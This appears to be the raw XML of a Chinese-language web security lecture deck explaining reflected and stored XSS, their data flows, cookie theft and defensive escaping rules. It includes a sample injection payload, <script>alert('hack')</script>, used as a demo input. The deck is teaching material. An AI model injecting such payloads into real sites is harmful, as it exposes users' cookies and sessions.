            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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不经过后端</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>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数据流向是：</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URL--&gt;</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浏览器 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="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413506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90340" y="2456815"/>
            <a:ext cx="4956810" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>反射型XSS攻击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343150" y="47282"/>
            <a:ext cx="8787765" cy="6823075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192405" y="1001395"/>
            <a:ext cx="2794000" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客给用户发送带有恶意脚本代码参数的 URL。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当 URL 地址被打开时，特有的恶意代码参数被 HTML 解析、执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467735" y="3273425"/>
            <a:ext cx="1937385" cy="88836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7025640" y="5381625"/>
            <a:ext cx="1664970" cy="69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0"/>
            <a:ext cx="6123305" cy="6729730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113145" y="93345"/>
            <a:ext cx="5191125" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123305" y="1931035"/>
            <a:ext cx="4848225" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>在输入框中提交数据： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert('hack')&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8263890" y="4267835"/>
            <a:ext cx="3928110" cy="2461895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113145" y="2760980"/>
            <a:ext cx="5181600" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151755" y="5705475"/>
            <a:ext cx="2987675" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>数据流向：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前端--&gt;后端--&gt;前端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3259455" y="0"/>
            <a:ext cx="2444750" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射型XSS攻击示例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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1078230"/>
            <a:ext cx="11840845" cy="5690235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030605" y="5699125"/>
            <a:ext cx="2987675" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>数据流向：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前端--&gt;后端--&gt;前端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672590" y="0"/>
            <a:ext cx="10407650" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者发送给被攻击者一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>邮件信息或者链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当被攻击者点击并访问该链接时，此时就会向攻击者的目标服务器发起请求，此时根据请求返回相关的script代码，当浏览器解析这些script代码时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此时代码就会在浏览器执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，造成用户被攻击。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0050" y="264160"/>
            <a:ext cx="11580495" cy="4375785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912620" y="4842510"/>
            <a:ext cx="9501505" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当我们访问一个网站时，此时如果攻击者在该网站上设置了一个恶意连接，此时当我们点击该链接时，就会向攻击者服务器发起请求，返回对应的脚本，此时当浏览器加载该脚本文件时，就会出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token或者cookie等信息的泄漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>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0167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XSS反射型攻击</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>防范</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986915" y="1727114"/>
            <a:ext cx="9589135" cy="4887595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Web 页面渲染的所有内容或者渲染的数据都必须</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来自于服务端。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>尽量不要从 URL，document.referrer，document.forms 等这种 DOM API 中获取数据直接渲染。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>尽量不要使用eval, new Function()，document.write()，document.writeln()，window.setInterval()，window.setTimeout()，innerHTML，document.createElement() 等可执行字符串的方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>如果做不到以上几点，也必须对涉及 DOM 渲染的方法传入的字符串参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>做 escape 转义。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>前端渲染的时候对任何的字段都需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>做 escape 转义编码，消除特殊字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E93A79-769E-ABEF-DC0E-397B36788F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215687" y="896117"/>
            <a:ext cx="8844896" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>此类 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>通常出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网站的搜索栏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户登录口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>等地方，常用来窃取客户端 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>或进行钓鱼欺骗</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90340" y="2456815"/>
            <a:ext cx="4956810" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1"/>
              <a:t>存储型XSS攻击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80385" y="6350"/>
            <a:ext cx="9111615" cy="6851650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397510" y="1205230"/>
            <a:ext cx="3959225" cy="4887595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一般存在于 Form 表单提交等交互功能，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文章留言，提交评论</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>文件等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>黑客利用的 XSS 漏洞，将内容经正常功能提交进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库、文件目录持久保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，当前端页面获得后端从数据库中读出的注入代码时，恰好将其渲染执行。</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UyZTI2MTkzNDY1ZGJlZDVmMzg1ZjY0MTk2ZGEwN2UifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="8d409b23-b6c7-4489-bc29-c1aeb0045fc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45425</TotalTime>
  <Words>12052</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>963</Paragraphs>
  <Slides>133</Slides>
  <Notes>63</Notes>
  <HiddenSlides>15</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133</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="146" baseType="lpstr">
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>pingfang SC</vt:lpstr>
      <vt:lpstr>pingfang SC</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>项目架构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SQL注入的发生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1、数字型注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2、字符型注入</vt:lpstr>
      <vt:lpstr>2、字符型注入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katherinechan608@gmail.com</cp:lastModifiedBy>
  <cp:revision>657</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-24T04:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-13T01:46:35Z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43383C4515964BB99A3E268A6BD29E87</vt:lpwstr>
  </property>
</Properties>
</file>